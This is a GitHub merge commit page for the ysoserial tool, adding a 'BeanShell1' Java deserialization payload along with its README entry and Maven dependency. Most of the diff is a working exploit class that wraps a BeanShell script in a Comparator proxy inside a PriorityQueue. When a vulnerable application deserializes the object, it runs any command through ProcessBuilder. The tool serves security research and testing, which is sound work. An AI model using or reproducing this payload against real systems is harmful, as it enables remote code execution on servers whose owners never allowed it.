Merge pull request #13 from pwntester/master

BeanShell exploit
frohoff · Feb 28, 2016 · 3957436 · 3957436
2 parents adb16e1 + c616a23
commit 3957436
Show file tree

Hide file tree

Showing 3 changed files with 59 additions and 0 deletions.
diff --git a/README.md b/README.md
@@ -33,6 +33,7 @@ $ java -jar target/ysoserial-0.0.4-all.jar
 Y SO SERIAL?
 Usage: java -jar ysoserial-[version]-all.jar [payload type] '[command to execute]'
         Available payload types:
+                BeanShell1 [org.beanshell:bsh:2.0b5]
                 CommonsBeanutilsCollectionsLogging1 [commons-beanutils:commons-beanutils:1.9.2, commons-collections:commons-collections:3.1, commons-logging:commons-logging:1.2]
                 CommonsCollections1 [commons-collections:commons-collections:3.1]
                 CommonsCollections2 [org.apache.commons:commons-collections4:4.0]

diff --git a/pom.xml b/pom.xml
@@ -101,6 +101,11 @@
 			<artifactId>commons-collections</artifactId>
 			<version>3.1</version>
 		</dependency>
+		<dependency>
+ 			<groupId>org.beanshell</groupId>
+ 			<artifactId>bsh</artifactId>
+ 			<version>2.0b5</version>
+ 		</dependency>
         <dependency>
             <groupId>commons-beanutils</groupId>
             <artifactId>commons-beanutils</artifactId>

diff --git a/src/main/java/ysoserial/payloads/BeanShell1.java b/src/main/java/ysoserial/payloads/BeanShell1.java
@@ -0,0 +1,53 @@
+package ysoserial.payloads;
+
+import bsh.Interpreter;
+import bsh.XThis;
+
+import java.io.*;
+import java.lang.reflect.Field;
+import java.lang.reflect.InvocationHandler;
+import java.lang.reflect.Proxy;
+import java.util.Comparator;
+import java.util.PriorityQueue;
+import ysoserial.payloads.util.Reflections;
+import ysoserial.payloads.annotation.Dependencies;
+import ysoserial.payloads.util.PayloadRunner;
+
+/**
+ * Credits: Alvaro Munoz (@pwntester) and Christian Schneider (@cschneider4711)
+ */
+
+@SuppressWarnings({ "rawtypes", "unchecked", "restriction" })
+@Dependencies({ "org.beanshell:bsh:2.0b5" })
+public class BeanShell1 extends PayloadRunner implements ObjectPayload<PriorityQueue> {
+
+    public PriorityQueue getObject(String command) throws Exception {
+	// BeanShell payload
+	String payload = "compare(Object foo, Object bar) {new java.lang.ProcessBuilder(new String[]{\"" + command + "\"}).start();return new Integer(1);}";
+
+	// Create Interpreter
+	Interpreter i = new Interpreter();
+
+	// Evaluate payload
+	i.eval(payload);
+
+	// Create InvocationHandler
+	XThis xt = new XThis(i.getNameSpace(), i);
+	InvocationHandler handler = (InvocationHandler) Reflections.getField(xt.getClass(), "invocationHandler").get(xt);
+
+	// Create Comparator Proxy
+	Comparator comparator = (Comparator) Proxy.newProxyInstance(Comparator.class.getClassLoader(), new Class<?>[]{Comparator.class}, handler);
+
+	// Prepare Trigger Gadget (will call Comparator.compare() during deserialization)
+	final PriorityQueue<Object> priorityQueue = new PriorityQueue<Object>(2, comparator);
+	Object[] queue = new Object[] {1,1};
+	Reflections.setFieldValue(priorityQueue, "queue", queue);
+	Reflections.setFieldValue(priorityQueue, "size", 2);
+
+	return priorityQueue;
+    }
+
+    public static void main(final String[] args) throws Exception {
+	PayloadRunner.run(BeanShell1.class, args);
+    }
+}